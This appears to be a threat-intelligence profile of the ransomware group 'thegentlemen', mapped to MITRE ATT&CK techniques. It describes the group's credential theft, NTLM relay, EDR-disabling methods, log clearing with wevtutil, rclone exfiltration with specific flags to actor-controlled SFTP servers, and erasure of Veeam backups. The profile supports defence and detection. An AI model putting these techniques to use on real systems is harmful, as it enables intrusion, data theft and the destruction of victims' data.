thegentlemen

T1078Valid Accounts

Use of valid accounts for initial access.

T1078.002Valid Accounts: Domain Accounts

Use of valid domain accounts for initial access.

T1133External Remote Services

openconnect used to authenticate to FortiGate SSL VPN (--protocol=fortinet). Actors connect post-credential-acquisition to enumerate internal network routes.

T1190Exploit Public-Facing Application

Exploitation of public-facing applications for initial access.

T1566Phishing

Spear-phishing via compromised corporate OWA mailboxes. ZIP payloads containing LNK files disguised as PDF/DOC/XLS or malicious Office documents sent from legitimate company email accounts to bypass spam filters.

T1047Windows Management Instrumentation

NetExec (nxc) with -X/-x flags for remote PowerShell/CMD execution over WMI/SMB. TrustedSec Titanis used for WMI-based remote execution via NTLM hashes.

T1059Command and Scripting Interpreter

Use of command and scripting interpreters for execution.

T1059.001Command and Scripting Interpreter: PowerShell

Use of PowerShell for execution.

T1059.003Command and Scripting Interpreter: Windows Command Shell

Use of Windows Command Shell for execution.

T1072Software Deployment Tools

Ransomware locker and EDR killers deployed domain-wide via GPO (deploy_gpo.ps1). GPO configured to run binaries at startup on all domain-joined machines.

T1136Create Account

Creation of accounts for persistence.

T1543Create or Modify System Process

Velociraptor deployed as a SYSTEM-level Windows service via MSI (Server.Utils.CreateMSI artifact) for persistent beacon access.

T1547Boot or Logon Autostart Execution

Boot or logon autostart execution for persistence.

T1068Exploitation for Privilege Escalation

Exploitation of vulnerabilities for privilege escalation.

T1187Forced Authentication

PetitPotam coercion via NXC coerce_plus module to trigger NTLM authentication from domain hosts toward attacker-controlled relay listener.

T1557Adversary-in-the-Middle

Responder (SMB/HTTP disabled) combined with ntlmrelayx targeting LDAP for machine account creation. RelayKing used to scan SMB/LDAP/MSSQL/HTTP/RPC/WinRM relay opportunities.

T1027Obfuscated Files or Information

Obfuscation of files or information to evade detection.

T1070Indicator Removal

Automated post-compromise script clears all Windows Event Logs via wevtutil, removes RDP MRU registry keys, deletes .rdp files, empties Recycle Bin, and clears RDP/SMB/WinRM logs.

T1090Proxy

ProxyChains (Windows/Linux), SSH dynamic port forwarding (-NfD 1080), ProxyJump multi-hop pivoting. Self-hosted double-VPN with WireGuard/OpenVPN and Amnezia VPN for operator anonymity.

T1112Modify Registry

Modifying the registry for defense evasion.

T1484.001Domain Policy Modification: Group Policy Modification

Modification of Group Policy for defense evasion.

T1562Impair Defenses

Impairing defenses to avoid detection.

T1562.001Impair Defenses: Disable or Modify Tools

BYOVD drivers ($3500-$5000 darknet), EDRStartupHinder, GFreeze/GLinker against CrowdStrike, IFEO registry redirecting EDR processes to calc.exe, WMI GlobalLogger/WPR symlink attacks to overwrite EDR binaries on boot.

T1003OS Credential Dumping

XenAllPasswordPro deployed via SMB for mass browser credential harvesting across all hosts. KslDump/KslKatz for LSASS dumping. Velociraptor for full memory dumps without AV detection. Pass-the-Hash via xfreerdp.

T1110Brute Force

Custom FortiGate panel bruter on dedicated hardware (dual Xeon, 120GB RAM) targeting non-standard ports. Credential spraying with known default passwords. Hydra for email spraying. Hash cracking via crackmd5.ru and chamd5.org.

T1552Unsecured Credentials

FortiGate configuration files exfiltrated containing plaintext LDAP credentials, local VPN user passwords, and IPSec pre-shared keys. MANSPIDER used to search SMB shares for credential files.

T1555Credentials from Password Stores

DumpBrowserSecrets used for browser credential and session cookie theft. Cookies imported via Cookie-Editor extension to hijack authenticated M365/CRM/email sessions.

T1018Remote System Discovery

gogo internal port scanner across /24 subnets (ports 22,53,80,88,389,443,445,636,3389,1433,5985) with 100 threads and ICMP ping. NetExec for SMB/WinRM/LDAP host enumeration.

T1046Network Service Discovery

Discovery of network services.

T1069Permission Groups Discovery

BloodHound/CertiHound for AD and AD CS (ESC1-ESC17) enumeration. ADFind and ldapdomaindump for group/permission mapping. PrivHound for LPE vector identification within AD.

T1087Account Discovery

Discovery of accounts within the environment.

T1087.002Account Discovery: Domain Account

Discovery of domain accounts within the environment.

T1482Domain Trust Discovery

Discovery of domain trust relationships.

T1526Cloud Service Discovery

AWS S3 buckets and EKS clusters enumerated post-access. Censys, Shodan, ZoomInfo, and c99.nl API used for external recon of VPN endpoints and subdomains.

T1021Remote Services

Use of remote services for lateral movement.

T1021.001Remote Services: Remote Desktop Protocol

Use of RDP for lateral movement.

T1021.002Remote Services: SMB/Windows Admin Shares

Use of SMB/Windows Admin Shares for lateral movement.

T1021.004Remote Services: SSH

Use of SSH for lateral movement.

T1563Remote Service Session Hijacking

Browser session cookies stolen via DumpBrowserSecrets and replayed via Cookie-Editor to hijack authenticated web application sessions (email, M365, CRM portals).

T1005Data from Local System

XenAllPasswordPro HTML credential reports collected per host. SQL database full dumps via phpMyAdmin exported to SFTP. File system enumeration targeting CRM code, backups, and financial data.

T1039Data from Network Shared Drive

Collection of data from network shared drives.

T1074Data Staged

Staging of collected data prior to exfiltration.

T1074.001Data Staged: Local Data Staging

Local staging of collected data prior to exfiltration.

T1114Email Collection

Corporate OWA mailboxes accessed via purchased stealer logs (snusbase.com) to harvest internal communications, credentials, and sensitive documents.

T1048Exfiltration Over Alternative Protocol

Exfiltration of data over encrypted channels.

T1048.001Exfiltration Over Alternative Protocol: Exfiltration Over Symmetric Encrypted Non-C2 Protocol

Exfiltration over symmetric encrypted non-C2 channels.

T1537Transfer Data to Cloud Account

rclone to actor-controlled SFTP servers with high-parallelism (--transfers 16 --multi-thread-streams 8 --buffer-size 256M). Observed volumes: 13GB NAS, 3+TB Docker/Nexus, 100+GB Confluence/JIRA.

T1071Application Layer Protocol

Use of application layer protocols for C2 communication.

T1071.001Application Layer Protocol: Web Protocols

Use of web protocols for C2 communication.

T1219Remote Access Software

Use of remote access software for C2.

T1572Protocol Tunneling

SSH dynamic SOCKS proxies (ssh -NfD 1080) for network pivoting. ProxyChains (Windows/Linux) tunneling attack tools through SOCKS5 proxies acquired from spam/malware affiliates.

T1573Encrypted Channel

Cloudflare Tunnels blend C2 with legitimate HTTPS traffic. Chisel-ng (Rust, SSH-over-WebSocket-over-TLS) for reverse tunnels. Velociraptor C2 over TLS with signed MSI beacons.

T1486Data Encrypted for Impact

Encryption of data for extortion.

T1489Service Stop

Stopping services to maximize impact.

T1490Inhibit System Recovery

Veeam backup jobs stopped and tape media long-erased (Erase-VBRTapeMedium -Long). Docker and QEMU VMs killed pre-encryption. vCenter used to reset ESXi root passwords. Database services (MySQL, PostgreSQL, MongoDB, Redis, MSSQL) stopped before encryption.

T1491Defacement

Data deleted from CRM web panels and databases. chmod -R 777 applied to NAS filesystems to facilitate locker access and destroy access controls.